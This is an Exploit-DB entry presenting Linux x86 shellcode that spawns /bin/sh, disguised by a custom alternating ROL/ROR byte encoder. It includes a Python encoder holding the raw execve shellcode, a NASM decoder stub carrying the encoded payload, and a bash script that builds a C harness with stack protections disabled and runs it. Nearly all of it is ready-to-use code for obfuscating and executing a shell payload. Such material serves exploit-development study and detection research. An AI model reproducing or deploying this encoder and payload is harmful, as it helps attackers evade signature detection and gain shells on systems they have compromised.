Linux x86 - /bin/sh ROL/ROR Encoded Shellcode

2015-08-12T00:00:00
ID EDB-ID:37762
Type exploitdb
Reporter Anastasios Monachos
Modified 2015-08-12T00:00:00

Description

Linux x86 - /bin/sh ROL/ROR Encoded Shellcode. Shellcode exploit for lin_x86 platform

                                        
                                            Custom shellcode encoder/decoder that switches between byte ROR and byte ROL

1. Update eRORoROL-encoder.py with your shellcode
2. Run eRORoROL-encoder.py
3. Copy output from eRORoROL-encoder.py and update eRORoROL-decoder.nasm
4. Run eRORoROL_compile.sh

-----eRORoROL-encoder.py BEGIN CODE-----
#!/usr/bin/python
# Python Custom Encoding eRORoROL
# Author:   	Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]
# Description:  If index number is Even do a ROR, else do a ROL 

shellcode = ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")

format_slash_x = ""
format_0x = ""
counter = 0

max_bits = 8 
offset = 1

ror = lambda val, r_bits, max_bits: \
    ((val & (2**max_bits-1)) >> r_bits%max_bits) | \
    (val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1))
 
rol = lambda val, r_bits, max_bits: \
    (val << r_bits%max_bits) & (2**max_bits-1) | \
    ((val & (2**max_bits-1)) >> (max_bits-(r_bits%max_bits)))

print "Shellcode encryption started ..."

for x in bytearray(shellcode):
  #go through all hexadecimal values
  counter += 1   
  print "[i] Counter: "+str(counter)
  print "[i] Instruction in hex: "+ hex(x)
  print "[i] Instruction in decimal: "+ str(x)
  
  if counter%2==0:  #check if index number is odd or even
    print "[i] EVEN index, therefore do ROR"
    rox_encoded_instruction = ror(x, offset, max_bits)
  else:
    print "[i] ODD index therefore do ROL"
    rox_encoded_instruction = rol(x, offset, max_bits)

  encoded_instruction_in_hex = '%02x' % rox_encoded_instruction
  print "[i] Encoded instruction in hex: "+encoded_instruction_in_hex +"\n"

  #Beautify with 0x and comma
  format_0x += '0x'
  format_0x += encoded_instruction_in_hex+","

print "\n[+] Shellcode custom encoding done"
print "\n[i] Initial shellcode length: %d" % len(bytearray(shellcode))
length_format_0x = format_0x.count(',') 
print "[i] Encoded format 0x Length: %d" % length_format_0x
print "[i] Encoded format 0x:\t"+ format_0x 

if "0x0," in format_0x:  print "\n[!] :( WARNING: Output shellcode contains NULL byte(s), consider re-encoding with different offset."
else: print "\n[i] :) Good to go, no NULL bytes detected in output"

print "\n[i] Done!"
-----eRORoROL-encoder.py END CODE-----


-----eRORoROL-decoder.nasm BEGIN CODE-----
; Title: 	eRORoROL-decoder.nasm 	
; Author: 	Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]
; Description:	If index number is Even do a ROR, else do a ROL 

global _start

section .text
_start:
	jmp short call_shellcode

decoder:
	pop esi         ;shellcode on ESI
	xor ecx,ecx	;our loop counter
	mov cl, shellcode_length	;mov cl, 25;shellcode_length 25 bytes

check_even_odd:
	test  si, 01h	;perform (si & 01h) discarding the result but set the eflags
			;set ZF to 1 if (the least significant bit of SI is 0)
			;EVEN: if_least_significant_bit_of_SI_is_0 AND 01h: result is 0 then ZF=0)
			;ODD:  if_least_significant_bit_of_SI_is_1 AND 01h: result is 1 then ZF=1) 
	je even_number	;if SI==0 then the number is even 
			;else execute the odd number section

odd_number:
        rol byte [esi], 0x1     ;rol decode with 1 offset
	jmp short inc_dec

even_number:
        ror byte [esi], 0x1     ;ror decode with 1 offset

inc_dec:
	inc esi			;next instruction in the encoded shellcode
        loop check_even_odd	;loop uses ECX for counter 
	jmp short shellcode

call_shellcode:
	call decoder
	shellcode: db 0x62,0x60,0xa0,0x34,0x5e,0x97,0xe6,0x34,0xd0,0x97,0xc4,0xb4,0xdc,0xc4,0xc7,0x28,0x13,0x71,0xa6,0xc4,0xc3,0x58,0x16,0xe6,0x01
	shellcode_length equ $-shellcode

-----eRORoROL-decoder.nasm END CODE-----

-----eRORoROL_compile.sh BEGIN CODE-----
#!/bin/bash
echo '[+] Assembling with Nasm ... '
nasm -f elf32 -o $1.o $1.nasm

echo '[+] Linking ...'
ld -melf_i386 -o $1 $1.o

echo '[+] Dumping shellcode ...'

echo '' > shellcode.nasm
for i in `objdump -d $1 | tr '\t' ' ' | tr ' ' '\n' | egrep '^[0-9a-f]{2}$' ` ; do echo -n "\x$i" >> shellcode.nasm; done

echo '[+] Creating new shellcode.c ...'
cat > shellcode.c <<EOF
#include<stdio.h>
#include<string.h>
unsigned char code[] ="\\
EOF
echo -n "\\" >> shellcode.c
cat shellcode.nasm >> shellcode.c

cat >> shellcode.c <<EOF
";
main()
{
        printf("Shellcode Length:  %d\n", strlen(code));
        int (*ret)() = (int(*)())code;
        ret();
}
EOF

echo '[+] Compiling shellcode.c ...'
gcc -fno-stack-protector -z execstack -m32 -o shellcode shellcode.c

echo '[+] Done! Run ./shellcode to execute!'
-----eRORoROL_compile.sh END CODE-----